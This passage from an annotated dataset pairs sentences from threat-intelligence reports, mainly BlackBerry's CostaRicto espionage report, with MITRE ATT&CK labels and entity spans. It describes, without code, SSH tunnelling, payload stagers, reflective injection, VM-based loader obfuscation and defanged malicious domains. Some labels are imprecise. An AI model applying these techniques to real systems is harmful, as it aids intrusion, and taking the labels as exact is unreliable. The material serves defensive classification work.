systems.", "sentence_text": "References\nThe Rust Revolution: New Embargo Ransomware Steps In – Cyble Embargo Ransomware Group: The Interview (suspectfile.com)\nOmri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan Learn more For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn at , and on X (formerly Twitter) at To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s115-24e7a6", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "References\nThe Rust Revolution: New Embargo Ransomware Steps In – Cyble Embargo Ransomware Group: The Interview (suspectfile.com)\nOmri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan Learn more For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn at , and on X (formerly Twitter) at To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast:", "sentence_text": "November 3\n10 min read SesameOp: Novel backdoor uses OpenAI Assistants API for command and control October 20 20 min read Inside the attack chain:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s116-d0bbe9", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "November 3\n10 min read SesameOp: Novel backdoor uses OpenAI Assistants API for command and control October 20 20 min read Inside the attack chain:", "sentence_text": "Threat activity targeting Azure Blob Storage Azure Blob Storage is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale across diverse workloads and is increasingly targeted through sophisticated attack chains that exploit misconfigurations, exposed credentials, and evolving cloud tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s117-74baf7", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "Threat activity targeting Azure Blob Storage Azure Blob Storage is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale across diverse workloads and is increasingly targeted through sophisticated attack chains that exploit misconfigurations, exposed credentials, and evolving cloud tactics.", "sentence_text": "Learn how\nConnect with us on social YouTube LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s1-ce1cb1", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The CostaRicto Campaign: Cyber-Espionage Outsourced BlackBerry Blog The CostaRicto Campaign: Cyber-Espionage Outsourced The CostaRicto Campaign: Cyber-Espionage Outsourced RESEARCH & INTELLIGENCE / 11.12.20 / The BlackBerry Research and Intelligence Team Share on X Share on Facebook Share on LinkedIn With the undeniable success of Ransomware-as-a-Service (RaaS), the cybercriminal market has expanded its portfolio to add dedicated phishing and espionage campaigns to the list of illicit services on offer… During the past six months, the BlackBerry Research and Intelligence team have been monitoring a cyber-espionage campaign that is targeting disparate victims around the globe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s2-70c302", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "The CostaRicto Campaign: Cyber-Espionage Outsourced BlackBerry Blog The CostaRicto Campaign: Cyber-Espionage Outsourced The CostaRicto Campaign: Cyber-Espionage Outsourced RESEARCH & INTELLIGENCE / 11.12.20 / The BlackBerry Research and Intelligence Team Share on X Share on Facebook Share on LinkedIn With the undeniable success of Ransomware-as-a-Service (RaaS), the cybercriminal market has expanded its portfolio to add dedicated phishing and espionage campaigns to the list of illicit services on offer… During the past six months, the BlackBerry Research and Intelligence team have been monitoring a cyber-espionage campaign that is targeting disparate victims around the globe.", "sentence_text": "Mercenary groups offering APT-style attacks are becoming more and more popular.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s3-d352f5", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Mercenary groups offering APT-style attacks are becoming more and more popular.", "sentence_text": "Having a lot at stake, the cybercriminals must choose very carefully when selecting their commissions to avoid the risk of being exposed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s4-1b21ad", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Having a lot at stake, the cybercriminals must choose very carefully when selecting their commissions to avoid the risk of being exposed.", "sentence_text": "But even notorious adversaries experienced in cyber-espionage can benefit from adding a layer of indirection to their attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s5-22373a", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "But even notorious adversaries experienced in cyber-espionage can benefit from adding a layer of indirection to their attacks.", "sentence_text": "By using a mercenary as their proxy, the real attacker can better protect their identity and thwart attempts at attribution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "By using a mercenary as their proxy, the real attacker can better protect their identity and thwart attempts at attribution", "entities": [ { "text": "the real attacker ", "start": 37, "end": 55, "label": "ThreatActor" }, { "text": "using a mercenary as their proxy", "start": 3, "end": 35, "label": "Action" }, { "text": "protect their identity ", "start": 66, "end": 89, "label": "Action" }, { "text": "thwart attempts at attribution", "start": 93, "end": 123, "label": "Action" }, { "text": "mercenary ", "start": 11, "end": 21, "label": "ThreatActor" } ] }, { "uid": "mitre-86_mitre_report-p1-s6-14eb2f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "By using a mercenary as their proxy, the real attacker can better protect their identity and thwart attempts at attribution.", "sentence_text": "The command-and-control (C2) servers are managed via Tor and/or through a layer of proxies; a complex network of SSH tunnels are also established in the victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "The attacker managed C2 infrastructure using Tor and proxy layers and established SSH tunnels inside the victim environment to maintain covert communication channels.", "entities": [ { "text": "command-and-control (C2) servers", "start": 4, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "Tor", "start": 53, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "proxies", "start": 83, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "SSH tunnels", "start": 113, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "are also established", "start": 125, "end": 145, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s7-edcfcf", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "The command-and-control (C2) servers are managed via Tor and/or through a layer of proxies; a complex network of SSH tunnels are also established in the victim’s environment.", "sentence_text": "These practices reveal better-than-average operation security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s8-a45349", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "These practices reveal better-than-average operation security.", "sentence_text": "It’s not clear as of now if it’s something that the threat actors developed in-house or obtained for exclusive use as part of beta testing from another entity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s9-747676", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "It’s not clear as of now if it’s something that the threat actors developed in-house or obtained for exclusive use as part of beta testing from another entity.", "sentence_text": "It’s not impossible, though, that the stagers are simply being reused without recompilation (i.e.: by changing the C2 URLs via binary editing).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The attacker may modify existing stagers by editing the binary to change C2 URLs instead of recompiling.", "entities": [ { "text": "stagers", "start": 38, "end": 45, "label": "MalwareTool" }, { "text": " C2 URLs ", "start": 114, "end": 123, "label": "Action" }, { "text": " stagers are simply being reused without recompilation", "start": 37, "end": 91, "label": "Action" }, { "text": "changing the C2 URLs via binary editing", "start": 102, "end": 141, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s10-3683ce", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "It’s not impossible, though, that the stagers are simply being reused without recompilation (i.e.: by changing the C2 URLs via binary editing).", "sentence_text": "Some of the domain names hardcoded in the backdoor binaries seem to spoof legitimate domains (e.g.: the malicious domain sbibd[.]net spoofing a legitimate domain of the State Bank of India Bangladesh, sbibd.com).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "The backdoor uses hardcoded domains that imitate legitimate ones to deceive victims.", "entities": [ { "text": "backdoor binaries", "start": 42, "end": 59, "label": "MalwareTool" }, { "text": "sbibd.com", "start": 201, "end": 210, "label": "Infrastructure_Indicator" }, { "text": "sbibd[.]net ", "start": 121, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "spoofing a legitimate domain", "start": 133, "end": 161, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s11-7811f5", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Some of the domain names hardcoded in the backdoor binaries seem to spoof legitimate domains (e.g.: the malicious domain sbibd[.]net spoofing a legitimate domain of the State Bank of India Bangladesh, sbibd.com).", "sentence_text": "One of the IP addresses which the backdoor domains were registered to overlaps with an earlier phishing campaign attributed to APT28 (i.e.: according to RiskIQ data, the SombRAT domain akams[.]in was at the time of attack registered to the same IP address as the phishing domain mail.kub-gas[.]com).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "RiskIQ data showed the malicious domains shared the same IP address as earlier APT28 phishing infrastructure.", "entities": [ { "text": "APT28", "start": 127, "end": 132, "label": "ThreatActor" }, { "text": "SombRAT", "start": 170, "end": 177, "label": "MalwareTool" }, { "text": "akams[.]in", "start": 185, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "mail.kub-gas[.]com", "start": 279, "end": 297, "label": "Infrastructure_Indicator" }, { "text": "registered to the same IP address as the phishing domain", "start": 222, "end": 278, "label": "Action" }, { "text": " IP addresses", "start": 10, "end": 23, "label": "Infrastructure_Indicator" }, { "text": " overlaps with an earlier phishing campaign ", "start": 69, "end": 113, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s12-63bbc0", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "One of the IP addresses which the backdoor domains were registered to overlaps with an earlier phishing campaign attributed to APT28 (i.e.: according to RiskIQ data, the SombRAT domain akams[.]in was at the time of attack registered to the same IP address as the phishing domain mail.kub-gas[.]com).", "sentence_text": "However, BlackBerry researchers believe that a direct link between CostaRicto and APT28 is highly unlikely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s13-5ebc13", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "However, BlackBerry researchers believe that a direct link between CostaRicto and APT28 is highly unlikely.", "sentence_text": "It might be that the IP overlap is coincidental, or – just as plausible – that the earlier phishing campaigns have been outsourced to the mercenary on behalf of the actual threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s14-304039", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "It might be that the IP overlap is coincidental, or – just as plausible – that the earlier phishing campaigns have been outsourced to the mercenary on behalf of the actual threat actor.", "sentence_text": "Targeting\nUnlike most of the state-sponsored APT actors, the CostaRicto adversary seems to be indiscriminate when it comes to the victims' geography.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s15-361ad7", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Targeting\nUnlike most of the state-sponsored APT actors, the CostaRicto adversary seems to be indiscriminate when it comes to the victims' geography.", "sentence_text": "Their targets are located in numerous countries across the globe with just a slight concentration in the South-Asian region:\nIndia\nBangladesh\nSingapore\nChina\nU.S.\nBahamas\nAustralia\nMozambique\nFrance\nNetherlands\nAustria\nPortugal\nCzechia\nThe victims’ profiles are diverse across several verticals, with a large portion being financial institutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s16-68cee9", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Their targets are located in numerous countries across the globe with just a slight concentration in the South-Asian region:\nIndia\nBangladesh\nSingapore\nChina\nU.S.\nBahamas\nAustralia\nMozambique\nFrance\nNetherlands\nAustria\nPortugal\nCzechia\nThe victims’ profiles are diverse across several verticals, with a large portion being financial institutions.", "sentence_text": "Delivery\nAfter gaining access to the victim’s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Set up remote tunneling using an SSH tool to maintain access within the victim environment.", "entities": [ { "text": "remote tunnelling", "start": 178, "end": 195, "label": "Action" }, { "text": "SSH tool", "start": 204, "end": 212, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s17-cfd67b", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Delivery\nAfter gaining access to the victim’s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool.", "sentence_text": "The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "The tool is set to redirect traffic from a malicious domain to a locally listening proxy.", "entities": [ { "text": "malicious domain", "start": 50, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "onfigured to redirect traffic", "start": 13, "end": 42, "label": "Action" }, { "text": "The tool ", "start": 0, "end": 9, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s18-79f6d8", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port.", "sentence_text": "The tunnel is authenticated using the attacker’s private key.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "The tunnel uses the attacker’s private key for authentication.", "entities": [ { "text": "the attacker’", "start": 34, "end": 47, "label": "ThreatActor" }, { "text": "authenticated using the attacker’s private key.", "start": 14, "end": 61, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s19-99fee2", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The tunnel is authenticated using the attacker’s private key.", "sentence_text": "In order to pull down the backdoor, a payload stager, either HTTP or reverse-DNS, is executed with the use of a scheduled task.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "A scheduled task runs an HTTP or reverse-DNS payload stager to download the backdoor.", "entities": [ { "text": "backdoor", "start": 26, "end": 34, "label": "MalwareTool" }, { "text": "payload stager,", "start": 38, "end": 53, "label": "MalwareTool" }, { "text": "executed with the use of a scheduled task", "start": 85, "end": 126, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s20-06fa39", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "In order to pull down the backdoor, a payload stager, either HTTP or reverse-DNS, is executed with the use of a scheduled task.", "sentence_text": "The backdoor comes either wrapped up in a PowerSploit reflective loader, or in the form of a custom-built dropper that uses a simple virtual machine (VM) mechanism to decode and inject the payload.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The custom dropper uses a simple VM mechanism to decode and inject the payload.", "entities": [ { "text": "PowerSploit reflective loader", "start": 42, "end": 71, "label": "MalwareTool" }, { "text": "custom-built dropper", "start": 93, "end": 113, "label": "MalwareTool" }, { "text": " uses a simple virtual machine (VM) mechanism to decode and inject the payload", "start": 118, "end": 196, "label": "Action" }, { "text": "backdoor ", "start": 4, "end": 13, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s21-41d0e4", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The backdoor comes either wrapped up in a PowerSploit reflective loader, or in the form of a custom-built dropper that uses a simple virtual machine (VM) mechanism to decode and inject the payload.", "sentence_text": "Toolset\nSombRAT: A custom backdoor (with both x86 and x64 versions)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s22-795e62", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "Toolset\nSombRAT: A custom backdoor (with both x86 and x64 versions)", "sentence_text": "CostaBricks: A custom VM-based payload loader (seen only with x86 SombRAT payloads so far)\nPowerSploit’s reflective PE injection module (seen with x64 SombRAT payloads)\nnmap: Port scanner PsExec PS1 Loader (x64)\nThe 64-bit backdoor is deployed in a fairly standard way.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s23-0dc0ab", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "CostaBricks: A custom VM-based payload loader (seen only with x86 SombRAT payloads so far)\nPowerSploit’s reflective PE injection module (seen with x64 SombRAT payloads)\nnmap: Port scanner PsExec PS1 Loader (x64)\nThe 64-bit backdoor is deployed in a fairly standard way.", "sentence_text": "It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory:\nCostaBricks Loader (x86)\nThe loader used with 32-bit backdoors is more technically compelling.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Uses a PowerShell loader based on Invoke-ReflectivePEInjection to decode and inject a payload DLL into memory.", "entities": [ { "text": "PowerShell loader", "start": 73, "end": 90, "label": "MalwareTool" }, { "text": "Invoke-ReflectivePEInjection PowerSploit module", "start": 104, "end": 151, "label": "MalwareTool" }, { "text": "utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory", "start": 62, "end": 206, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s24-22fa1c", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory:\nCostaBricks Loader (x86)\nThe loader used with 32-bit backdoors is more technically compelling.", "sentence_text": "It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Uses a custom VM to run embedded bytecode that decodes and injects the payload into memory.", "entities": [ { "text": "execute an embedded bytecode", "start": 72, "end": 100, "label": "Action" }, { "text": "decode and inject the payload into memory.", "start": 104, "end": 146, "label": "Action" }, { "text": "virtual machine mechanism", "start": 36, "end": 61, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s25-1d91fd", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory.", "sentence_text": "Code virtualization has been most prevalent in commercial software protectors which use much more advanced solutions; simpler virtual machines are sometimes also featured in off-the-shelf malicious packers used by widespread financial crimeware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s26-842d38", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Code virtualization has been most prevalent in commercial software protectors which use much more advanced solutions; simpler virtual machines are sometimes also featured in off-the-shelf malicious packers used by widespread financial crimeware.", "sentence_text": "To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink ( ), which never gets executed:\nThere is also an unused zlib decompression routine that seems to be leftover code from an older version of the loader.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The loader embeds full unobfuscated Blink application code to confuse anti-malware tools.", "entities": [ { "text": " loader", "start": 287, "end": 294, "label": "MalwareTool" }, { "text": "Blink", "start": 139, "end": 144, "label": "MalwareTool" }, { "text": "zlib decompression routine", "start": 201, "end": 227, "label": "MalwareTool" }, { "text": "confuse anti-malware solutions", "start": 11, "end": 41, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s27-886f65", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink ( ), which never gets executed:\nThere is also an unused zlib decompression routine that seems to be leftover code from an older version of the loader.", "sentence_text": "The compilation timestamps suggest that both the loader and the embedded payload are compiled at the same time (with only a few seconds difference).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s28-d2ba68", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "The compilation timestamps suggest that both the loader and the embedded payload are compiled at the same time (with only a few seconds difference).", "sentence_text": "One of the loaders had the following PDB path, suggesting that the internal name of the project is CostaRicto/ CostaBricks:\nVirtual Machine Internals The virtual machine mechanism is implemented with the usage of C++ objects and classes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s29-6cc8cd", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "One of the loaders had the following PDB path, suggesting that the internal name of the project is CostaRicto/ CostaBricks:\nVirtual Machine Internals The virtual machine mechanism is implemented with the usage of C++ objects and classes.", "sentence_text": "There are 20 different VM instructions, each having between zero and three operands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s30-ee5b81", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "There are 20 different VM instructions, each having between zero and three operands.", "sentence_text": "Dynamically allocated “registers” are small memory regions organized in the form of dictionary objects in doubly linked list.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s31-19e34b", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Dynamically allocated “registers” are small memory regions organized in the form of dictionary objects in doubly linked list.", "sentence_text": "Each register has its own unique index that can store up to 8 bytes of data (including pointers to larger memory buffers) and can be either read or written to.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s32-22d1d4", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Each register has its own unique index that can store up to 8 bytes of data (including pointers to larger memory buffers) and can be either read or written to.", "sentence_text": "If the operand metadata specifies the index value, the operand is a \"register\"; otherwise the operand contains an immediate value.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s33-8ded8c", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "If the operand metadata specifies the index value, the operand is a \"register\"; otherwise the operand contains an immediate value.", "sentence_text": "Opcodes\nEach opcode has its own handler routine, which is executed in the main VM loop:\nThe handler routine will check to see if the number and types of operands are valid, read operand values from VM “registers”, perform a specific action (arithmetic/byte operation, comparison, jump, API call), and save results to a destination “register”:\nThe Bytecode\nAll of the x86 loaders BlackBerry has seen thus far embed the exact same bytecode that is 1800 (0x708) lines long.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s34-864266", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "Opcodes ...", "sentence_text": "Most of these 1800 instructions are superfluous (i.e.: have no influence on the code functionality) and were inserted there for obfuscation only.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "superfluous instructions were inserted for obfuscation", "entities": [ { "text": "were inserted there for obfuscation", "start": 104, "end": 139, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s35-7f4f87", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Most of these 1800 instructions are superfluous (i.e.: have no influence on the code functionality) and were inserted there for obfuscation only.", "sentence_text": "The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it:\nThe payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Bytecode decrypts payload, loads it reflectively, and executes it.", "entities": [ { "text": "decrypt the embedded payload", "start": 34, "end": 62, "label": "Action" }, { "text": "load it into memory", "start": 64, "end": 83, "label": "Action" }, { "text": "execute it:", "start": 101, "end": 112, "label": "Action" }, { "text": "bytecode", "start": 19, "end": 27, "label": "MalwareTool" }, { "text": "embedded payload", "start": 46, "end": 62, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s36-147a87", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it:\nThe payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys.", "sentence_text": "These constant values are used in all x86 SombRAT droppers we’ve seen so far:\nSombRAT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s37-3c9ef4", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "These constant values are used in all x86 SombRAT droppers we’ve seen so far:\nSombRAT", "sentence_text": "Backdoor\nThe backdoor delivered by the above-mentioned loaders is a C++ compiled executable developed with heavy usage of objects, classes, and interfaces.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s38-c884d2", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Backdoor\nThe backdoor delivered by the above-mentioned loaders is a C++ compiled executable developed with heavy usage of objects, classes, and interfaces.", "sentence_text": "It has a plugin architecture and basic functionality of a foothold RAT that is mainly used to download and execute other malicious payloads – either as its own plugins or standalone binaries.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Used to download and execute malicious payloads.", "entities": [ { "text": "foothold RAT ", "start": 58, "end": 71, "label": "MalwareTool" }, { "text": "download and execute other malicious payloads", "start": 94, "end": 139, "label": "Action" }, { "text": "malicious payloads", "start": 121, "end": 139, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s39-79d018", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "It has a plugin architecture and basic functionality of a foothold RAT that is mainly used to download and execute other malicious payloads – either as its own plugins or standalone binaries.", "sentence_text": "It can also perform other simple actions, like collecting system information, listing and killing processes, and uploading files to the C2.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Collects system info, enumerates and kills processes, and uploads files to C2.", "entities": [ { "text": "C2", "start": 136, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "collecting system information", "start": 47, "end": 76, "label": "Action" }, { "text": "listing and killing processes", "start": 78, "end": 107, "label": "Action" }, { "text": "uploading files to the ", "start": 113, "end": 136, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s40-35027f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "It can also perform other simple 